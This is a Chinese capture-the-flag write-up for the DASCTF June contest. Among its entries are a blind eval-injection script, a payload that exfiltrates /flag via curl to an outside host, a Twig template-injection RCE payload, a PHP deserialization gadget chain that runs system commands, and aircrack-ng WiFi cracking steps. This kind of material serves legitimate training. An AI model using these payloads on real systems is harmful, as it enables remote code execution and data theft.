被队友带躺了,大师傅们太强了叭
WEB
简单的计算器1
盲注//直接复制的Y老师脚本
import requests
import re
s = requests.Session()
q = ''
u = 'http://183.129.189.60:10026'
def get_question():
global q
r = s.get(u).text
r = re.compile('<h4>([^<]+)</h4>').findall(r)[0][:-1]
q = eval(r)
def submit_answer(i, c):
global q
r = s.post(u, data={'input': str(q) + f"and '{c}'==open('/flag').read()[{i}]"}).text
r0 = re.compile('<h3>([^<]+)</h3>').findall(r)[0] == 'Congratulations'
q = eval(re.compile('<h4>([^<]+)</h4>').findall(r)[0][:-1])
return r0
get_question()
ans = ''
import string
for i in range(100):
for j in string.printable:
if submit_answer(i, j):
ans+=j
print(ans)
break
简单的计算器2
依然盲注,过滤了read 拼接下
///好像可以直接curl带出数据
exec("o"+"s.s"+"ystem('curl -T /flag ip:port')")
filecheck
非预期了。
有读取文件
sha256跑出来是chen
测试过程中发现读取文件页面只能是xyz结尾。继续测试发现只要传入变量有xyz即可绕过限制
盲猜了read页面
http://183.129.189.60:10023/read/?token=chen&file=/proc/self/cmdline&file1=xyz
直接读到etc
读一下/proc/self/environ
拿到flag
Subscribe
STMP+TWIG模板注入
<?php
require_once "mail/smtp.class.php";
require_once "mail/smtp.send.php";
require_once "libs/common.func.php";
include 'vendor/twig/twig/lib/Twig/Autoloader.php';
function mailCheck($s) {
if (preg_match('/\\\|\/|\~|&|\^|\`|\*|\?/i',$s))
{
alertMes('damn hacker!', './index.php');
return false;
}
if (!preg_match('/libs|smtp|curl|dev|index\.php|ftp|backdoor|sh/i', $s) )
{
if ( preg_match_all('/@/', $s) === 1 )
{
$arr = explode('@',$s);
$domain = end($arr);
if (!preg_match('/[^a-z0-9._-]/i', $domain))
{
return true;
}
}
}
return false;
}
function alertMes($mes, $url)
{
echo "<script>
alert('{$mes}');
location.href='{$url}';
</script>";
die;
}
$smtpEmailTo = $_POST['toemail'];
if (!mailCheck($smtpEmailTo))
{
alertMes("hacker", "/index.php"); //die;
}
//为了减少邮件服务器压力,任何fuzz都请带上$_POST['test'] 请充分测试后再订阅并发邮件,如果检测到某个用户频繁无脑发邮件会被封禁。
if (isset($_POST['test']))
{
user_are_fuzzing_and_smtp_server_wont_send_email();
die;
}
//do not trick
Twig_Autoloader::register();
$loader = new Twig_Loader_String()
$twig = new Twig_Environment($loader);
$yourName = pos(explode( '@', $smtpEmailTo));
$content = @$twig->render($yourName);
$mailcontent = "<h1>Hello <font color=red>".$content."</font><br>Welcome to DASCTF June, Have FUN!</h1>";
$smtp = new Smtp($smtpserver, $smtpserverport, true, $smtpuser, $smtppass);
$smtp->debug = false;
$state = $smtp->sendmail($smtpEmailTo, $smtpusermail, $mailtitle, $mailContent, $mailtype);
/* flag is in flag.php */
https://xz.aliyun.com/t/7507#toc-3
直接改改就用了
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("a=cat;b=flag.php;$a $b")}}@ha1c9on.top
phpuns
php session反序列化字符逃逸
见的相当多了。
给了源码:
<?php
class User{
protected $username;
protected $password;
protected $admin;
public function __construct($username, $password){
$this->username = $username;
$this->password = $password;
$this->admin = 0;
}
public function get_admin(){
return $this->admin;
}
}
class Hacker_A{
public $c2e38;
public function __construct($c2e38){
$this->c2e38 = $c2e38;
}
public function __destruct() {
if(stristr($this->c2e38, "admin")===False){
echo("must be admin");
}else{
echo("good luck");
}
}
}
class Hacker_B{
public $c2e38;
public function __construct($c2e38){
$this->c2e38 = $c2e38;
}
public function get_c2e38(){
return $this->c2e38;
}
public function __toString(){
$tmp = $this->get_c2e38();
$tmp();
return 'test';
}
}
class Hacker_C{
public $name = 'admin';
public function __invoke(){
var_dump(system('cat /flag'));
}
}
直接给了cat /flag 所以直接写链子调用就行
$a=new Hacker_A(new Hacker_B(new Hacker_C));
注意的是这里会检测c2e38,但是又得用,所以手动替换十六进制
O:8:"Hacker_A":1:{S:5:"c2\6538";O:8:"Hacker_B":1:{S:5:"c2\6538";O:8:"Hacker_C":1:{s:4:"name";s:5:"admin";}}}
function可以发现替换字符
<?php function redirect($path) { header('Location: ' . $path); exit(); } function add($data) { $data = str_replace(chr(0).'*'.chr(0), '\0*\0', $data); return $data; } function reduce($data) { $data = str_replace('\0*\0', chr(0).'*'.chr(0), $data); return $data; } function check($data) { if(stristr($data, 'c2e38')!==False){ die('exit'); } }
构造不说了,拿着用户名密码登陆就是flag
username:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
password: ";s:11:"\0\0password";O:8:"Hacker_A":1:{S:5:"c2\6538";O:8:"Hacker_B":1:{S:5:"c2\6538";O:8:"Hacker_C":1:{s:4:"name";s:4:"test";}}s:8:"\0\0admin";i:1;}
MISC
cryptographic_call
bmp盲水印,换表base64
physical-hacker
wifi流量分析
aircrack-ng WiFi.cap
先拿到ssid:DASCTF
aircrack-ng 1.cap -w /usr/share/wordlists/rockyou.txt
拿到密码66666666
airdecap-ng 1.cap -e DASCTF -p 66666666
得到解密的流量
导出一个压缩包,有flag.txt
snow隐写
http://fog.misty.com/perry/ccs/snow/snow/snow.html
空秘钥解得
MZWGCZZANFZTUICOMVYHWNRXGBRDCNBXGI4GCZBZHEYDEYLFMNRGCMZSMUZDEZTBGRTDMYTEPUQGG33OM5ZGCZDVNRQXI2LPNZZSCIJB
BASE32得到flag
BaiduYun&Gcode
将数据库导入
得到文件大小和md5
根据:https://blog.jixun.moe/du-code-gen
了解到百度云另一种下载方式,拿到xshadow.png
binwalk 分离到gcode 3D打印
http://gcode.ws/
拿到flag
Keyboard
内存取证拿到QWE键盘加密
2020- 3-29 22:35:30
2020- 3-29 22:36:41
ctfwikiCRYPTO ABC
CTKQEKNHZHQLLVGKROLATNWGQKRRKQGWNTA
2020- 3-29 22:37:23
[BP][BP]decrypto hou xiao xie geng[BP][BP] yi kan chu
2020- 3-29 22:39:24
But the password is in uppercase
2020- 3-29 22:38:55
a
拿到加密磁盘密码:
VERACRYPTPASSWORDISKEYBOARDDRAOBYEK
挂载一个磁盘镜像,ntfs隐写
透明度
A通道有个压缩包。
解压用Archive password掩码爆破,压缩包密码nepnb
拿到flag
SMB
同样内存取证,dump下TrueCrypt.exe
没找到秘钥。
后盲猜加密磁盘密码是administrator密码:
qweasd!123
成功挂载。拿到文件
<疫情xxxxxxxxxx>
十六进制转字符
base58
CRYPTO
Gemini-Man
rsa大数分解
import sympy
x = sympy.symbols(“x”)
a = sympy.solve([x*x+x–7943722218936282],[x])
fl=open('list.txt', 'w')
fl.write(str(a))
得到
pq
rsa已知pqne
盲猜e = 65537
import gmpy2
from Crypto.Util import number
f = open('c:\\users\\admin\\desktop\\list.txt', 'r')
p = int(f.readline())
ff = open('c:\\users\\admin\\desktop\\list1.txt', 'r')
q = int(ff.readline())
fff= open('c:\\users\\admin\\desktop\\C.txt', 'r')
c = int(fff.readline())
e = 65537
d = gmpy2.invert(e, (p-1)*(q-1))
# print d
m = pow(c, d, p*q)
x = number.long_to_bytes(m)
print(number.long_to_bytes(m))
fl=open('list2.txt', 'w')
fl.write(str(x))
得到flag
[…] 找到了一个很像这道题的ctf => 链接 […]